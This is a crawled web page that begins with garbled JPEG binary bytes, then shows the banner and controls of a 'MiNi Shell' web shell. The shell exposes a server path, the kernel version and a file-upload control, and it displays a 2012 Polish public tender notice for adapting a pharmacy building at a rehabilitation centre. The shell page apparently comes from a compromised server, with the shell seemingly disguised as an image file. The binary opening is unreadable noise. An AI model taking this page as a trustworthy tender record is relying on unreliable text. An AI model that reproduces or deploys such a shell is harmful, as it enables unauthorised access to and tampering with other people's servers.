JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120919/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120919/356102-N-2012.html

<p class="kh_header"><b>Stąporków: Adaptacja budynku apteki na budynek  użyteczności publicznej w Świętokrzyskim Centrum Rehabilitacji w Czarnieckiej Górze.</b><br>
<b>Numer ogłoszenia: 356102 - 2012; data zamieszczenia: 19.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Świętokrzyskie Centrum Rehabilitacji w Czarnieckiej Górze , Czarniecka Góra 43, 26-220 Stąporków, woj. świętokrzyskie, tel. 041 3741163, faks 041 3741162.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rehabilitacjascr.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Adaptacja budynku apteki na budynek  użyteczności publicznej w Świętokrzyskim Centrum Rehabilitacji w Czarnieckiej Górze..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia stanowi wykonanie robót remontowych w istniejącym budynku użyteczności publicznej, polegających na otworzeniu stanu pierwotnego z przy zastosowaniu innych materiałów, w zakresie: 

1.zerwania wykładzin podłogowych z wykonaniem wylewek samopoziomujących i ułożenia     płytek ceramicznych oraz wykładzin atestowanych z zastosowaniem cokołu o wys.15cm, 
2. wymurowanie ścianek działowych z pustaka gazobetonowego na zaprawie cementowo -     wapiennej z otynkowaniem ścian, 
3. miejscowa naprawa tynków, zastosowanie gładzi gipsowej, malowanie ścian i sufitów     farbami emulsyjnymi, 
4. wymurowanie komina wentylacyjnego z typowych kształtek ceramicznych, obmurowanych     cegłą ceramiczną na zaprawie cementowo - wapiennej, z otynkowaniem, 
5. montaż nowej stolarki drzwiowej (drewnianej) z framugami stalowymi,  
6. montaż nowej stolarki okiennej z PVC z nawiewnikami powietrza, 
7. montaż nowych parapetów wewnętrznych z konglomeratów i zewnętrznych stalowych, 
8. wymiana kaloryferów ze stalowych na żeliwne z malowaniem powierzchni, 
9. wykonanie otworów drzwiowych z ściance działowej z zastosowaniem nadproży     prefabrykowanych L - 19 typu D, 
10. montaż w pomieszczeniach sanitarnych (misek ustępowych, umywalek, brodzików z kabiną natryskową, wentylatorów w kanałach wentylacyjnych), 
11. montaż wentylacji sufitowej mechanicznej i grawitacyjnej z rur stalowych, dwu-  płaszczowych, wyprowadzonych ponad dach, 
12. wymiany wew. instalacji elektrycznej, 
13. wymiany wew. instalacji teleinformatycznej i telewizyjnej, 
14. wymiana elementów instalacji wod. - kan, i centralnego ogrzewania wodnego, 
15. wymiana barierki metalowej przy schodach zewnętrznych, 
16. montaż pochwytu metalowego na ścianie przy schodach zewnętrznych, 
17. zerwanie istniejących płytek gresowych na schodach zewnętrznych, wyrównanie powierzchni, ułożenie nowych płytek o parametrach antypoślizgowych, 
18. wykonanie docieplenia ścian zewnętrznych styropianem FS 20, gr. 12cm z zastosowaniem  tynku cienkowarstwowego - mineralnego, 
19. wykonanie docieplenia stropu nad budynkiem przy zastosowaniu folii paroszczelnej i wełny mineralnej o gr. 20cm
20. wykonanie obłożenia cokołu budynku z piaskowca, 
21. wykonanie izolacji pionowej fundamentów i ścian fundamentowych budynku, 
22. wymianie rury kanalizacyjnej z budynku na rurę PVC O 160mm do najbliższej studzienki kanalizacyjnej..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.23.24.40-8, 45.31.12.00-2, 45.31.42.00-3, 45.32.10.00-3, 45.33.11.00-7, 45.33.12.10-1, 45.33.20.00-3, 45.33.24.00-7, 45.40.00.00-1, 45.41.00.00-4, 45.42.10.00-4, 45.43.10.00-7, 45.43.21.11-5, 45.44.21.00-8, 45.44.30.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający nie przewiduje udzielania zaliczek na poczet wykonania zamówienia.
2. Zamawiający wymaga wniesienia wadium przed upływem terminu składania ofert,  które musi być obejmować cały okres związania ofertą.
Kwota wadium: 2500 zł. (słownie: dwa tysiące pięćset złotych) 
Wadium może być wnoszone w następujących formach:
a)  pieniądzu,
b)  poręczeniach bankowych, 
c)  gwarancjach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-
     kredytowej, z tym , że poręczenie kasy jest zawsze poręczeniem pieniężnym;
d)  gwarancjach ubezpieczeniowych,
e)  poręczeniach udzielanych przez podmioty, o których mowa w art.6b ust.5 pkt 2 Ustawy z dnia 09.11.2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. nr 109, poz.1158, ze zmianami).
3.  W przypadku wnoszenia wadium w pieniądzu, kwota wymieniona w pkt. XIII.2  powinna być wpłacona przelewem na konto Zamawiającego w  PEKAO S.A. nr rachunku: 

39 1240 4416 1111 0000 4957 1174 
tytułem: Wadium - przetarg na:  

Adaptacja budynku apteki na budynek  użyteczności publicznej w Świętokrzyskim Centrum Rehabilitacji w Czarnieckiej Górze 

4.  Za termin wniesienia wadium w formie pieniężnej będzie przyjęty termin uznania
     rachunku Zamawiającego (odnotowania wpływu środków na rachunek Zamawiającego)    
5. Dowód wniesienia wadium należy załączyć do oferty.
6.  Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.
7.  W przypadku wniesienia wadium w formie innej niż w pieniądzu - oryginał dokumentu
     należy złożyć lub przesłać z pismem przewodnim do siedziby Zamawiającego przed 
     upływem terminu składania ofert. Dokument wadium musi wyraźnie wskazywać na 
     wszystkie okoliczności jego utraty określone w art. 46 ust.4a i 5 Ustawy.
8.  Zamawiający zatrzymuje wadium w przypadkach wskazanych w art. 46 ust. 4a i 5 Ustawy.
9.  Zamawiający zwraca niezwłocznie wadium w przypadkach określonych w art. 46 ust.1, 1a)  i 2 Ustawy.
10. Nie wniesienie wadium przed upływem terminu składania ofert lub wniesienie wadium o terminie krótszym, niż okres związania ofertą- skutkuje wykluczeniem Wykonawcy na podstawie art. 24 ust.2 pkt 4 Ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnienie warunków udziału w postępowaniu według formuły:  spełnia albo nie spełnia na podstawie oświadczenia Wykonawcy , wymienionego w pkt. VIII.3b) SIWZ sporządzonego wg wzoru załącznika nr 4 do SIWZ. 

Zamawiający oceni spełnienie warunków udziału w postępowaniu według:  spełnia albo nie spełnia na podstawie oświadczenia Wykonawcy , wymienionego w pkt. VIII.3c) SIWZ sporządzonego wg wzoru  załącznika nr 5 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadanie wiedzy i doświadczenia, rozumianego jako należyte wykonanie,  w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednej roboty budowlanej , której zakres jest zgodny z przedmiotem niniejszego zamówienia, o wartości nie mniejszej niż 100 000  zł (brutto). Przez zakres zgodny z niniejszym zamówieniem uznaje się wykonanie, co najmniej jednej roboty budowlanej polegającej na remoncie obiektu  budowlanego użyteczności publicznej np. (szpital, przychodnia, przedszkole, szkoła, bud. administracji), o których mowa w § 3 pkt.6 Rozporządzenia Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponowania osobą-ami, która(e)  będą uczestniczyć w wykonywaniu zamówienia jako kierownik robót, z uprawnieniami  do  kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Przewidywane istotne zmiany umowy:
- w zakresie ewentualnej zmiany terminu wykonania umowy w przypadku wystąpienia opóźnień wynikających z:
a)  przestojów i opóźnień zawinionych przez Zamawiającego,
b) działania siły wyższej np. klęski żywiołowe, mające bezpośredni wpływ na terminowość wykonywania robót,
c) wystąpienia okoliczności, których strony umowy nie były w stanie 
     przewidzieć, pomimo zachowania należytej staranności,
d) wystąpienia robót dodatkowych , których termin wykonania, wpłynie na termin zakończenia zamówienia podstawowego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rehabilitacjascr.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Świętokrzyskie Centrum Rehabilitacji 
Czarniecka Góra 43, 26 - 220 Stąporków 
Bud. Administracji. pok.9
Tel:  (41)  372 18 17 
Fax: (41) 372 18 17.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.10.2012 godzina 11:00, miejsce: Świętokrzyskie Centrum Rehabilitacji 
Czarniecka Góra 43, 26 - 220 Stąporków 
Tel:  (41)  372 18 17 
Fax: (41) 372 18 17.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 20 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> -.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com